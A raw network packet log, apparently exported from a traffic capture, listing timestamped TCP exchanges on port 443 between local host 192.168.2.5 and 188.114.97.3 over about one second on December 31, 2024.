                                                                                                      Dec 31, 2024 09:25:09.268316031 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.268393040 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.268400908 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.269130945 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.269144058 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.269193888 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.269201040 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.269221067 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.288636923 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.288664103 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.288702011 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.288712025 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.288748980 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.309369087 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.309384108 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.309461117 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.309468985 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.319777012 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.319792986 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.319873095 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.319880962 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.320491076 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.320503950 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.320565939 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.320578098 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.332885027 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.332916975 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.332964897 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.332972050 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.333004951 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.333595037 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.333609104 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.333676100 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.333683014 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.355127096 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.355143070 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.355216980 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.355226994 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.355997086 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.356010914 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.356060028 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.356066942 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.356092930 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.375545025 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.375569105 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.375608921 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.375618935 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.375643969 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.396245003 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.396265030 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.396356106 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.396363974 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.406728029 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.406747103 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.406805992 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.406814098 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.407428980 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.407459021 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.407490015 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.407496929 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.407522917 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.419790983 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.419820070 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.419864893 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.419888973 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.419900894 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.420516968 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.420531034 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.420591116 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.420598984 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.442008972 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.442029953 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.442078114 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.442086935 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.442117929 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.442935944 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.442953110 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.443012953 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.443020105 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.462460041 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.462481976 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.462524891 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.462533951 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.462554932 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.483213902 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.483230114 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.483299017 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.483320951 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.483333111 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.494018078 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.494112015 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.494118929 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.494151115 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.494179010 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.494544983 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.494560003 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.494616032 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.494626045 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.494649887 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.506733894 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.506767035 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.506829977 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.506839991 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.506874084 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.507483006 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.507497072 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.507539988 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.507546902 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.507596016 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.528934002 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.528954983 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.529006958 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.529032946 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.529050112 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.529782057 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.529798985 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.529841900 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.529850006 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.529875994 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.549463034 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.549484015 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.549562931 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.549572945 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.570138931 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.570157051 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.570220947 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.570233107 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.580430031 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.580449104 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.580498934 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.580507994 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.580533981 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.581018925 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.581037998 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.581070900 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.581078053 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.581110954 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.593559980 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.593576908 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.593648911 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.593662977 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.594408989 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.594432116 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.594470978 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.594477892 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.594505072 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.615963936 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.615987062 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.616031885 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.616046906 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.616084099 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.616782904 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.616799116 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.616863966 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.616872072 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.636379957 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.636401892 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.636482954 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.636493921 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.656939030 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.656953096 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.657006979 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.657016039 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.667263985 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.667287111 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.667327881 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.667335033 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.667366982 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.668028116 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.668042898 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.668107986 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.668113947 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.680227995 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.680265903 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.680298090 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.680303097 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.680339098 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.680351973 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.681083918 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.681098938 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.681155920 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.681163073 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.686461926 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.702678919 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.702702045 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.702752113 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.702761889 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.702786922 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.702814102 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.703355074 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.703370094 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.703423977 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.703430891 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.703459978 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.703484058 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.723141909 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.723156929 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.723248959 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.723258972 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.726468086 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.743783951 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.743808985 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.743884087 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.743891954 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.744826078 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.753963947 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.753983021 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.754041910 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.754049063 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.754750967 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.754785061 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.754817009 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.754823923 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.754837990 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.754909992 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.767162085 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.767178059 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.767241955 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.767250061 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.768735886 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.789053917 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.789071083 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.789150953 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.789160013 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.789786100 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.789825916 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.789854050 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.789863110 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.789887905 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.789921045 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.790621042 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.790633917 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.790703058 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.790710926 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.793698072 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.810004950 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.810019970 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.810154915 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.810172081 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.810430050 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.830648899 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.830681086 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.830739021 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.830751896 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.830771923 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.830787897 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.841603041 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.841623068 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.841691971 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.841727018 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.842274904 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.842295885 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.842328072 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.842335939 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.842354059 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.842384100 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.854068041 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.854104996 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.854161978 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.854182005 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.854201078 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.854222059 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.876010895 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.876028061 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.876131058 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.876140118 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.876504898 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.876651049 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.876669884 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.876739025 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.876745939 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.877454042 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.877474070 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.877526999 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.877535105 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.877563000 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.877600908 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.897134066 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.897151947 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.897228956 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.897241116 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.899485111 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.917522907 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.917548895 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.917618990 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.917628050 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.917679071 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.928478003 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.928495884 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.928563118 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.928570032 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.928742886 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.929182053 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.929198980 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.929241896 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.929248095 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.929275990 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.929297924 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.940943003 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.940963030 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.941040039 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.941047907 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.942931890 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.963124990 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.963144064 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.963232040 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.963239908 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.963483095 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.963504076 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.963541985 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.963547945 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.963572025 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.963603973 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.983469009 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.983513117 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.983575106 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.983582020 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:09.983606100 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:09.983623981 CET49707443192.168.2.5188.114.97.3
